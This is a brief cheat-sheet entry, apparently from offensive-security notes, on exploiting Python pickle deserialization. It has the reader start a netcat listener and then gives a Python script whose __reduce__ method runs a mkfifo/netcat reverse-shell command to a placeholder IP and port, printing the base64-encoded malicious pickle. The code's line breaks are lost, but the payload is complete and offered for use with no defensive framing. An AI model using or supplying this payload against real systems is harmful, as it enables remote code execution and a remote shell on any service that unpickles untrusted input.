Pickle Serializing and de-serializing Python object structures,
- Start listener using nc -lvnp 4444- Run this on target system to get back shellimport pickleimport sysimport base64command ='rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat IP PORT > /tmp/f'classrce(object):def__reduce__(self):import osreturn (os.system,(command,))print(base64.b64encode(pickle.dumps(rce())))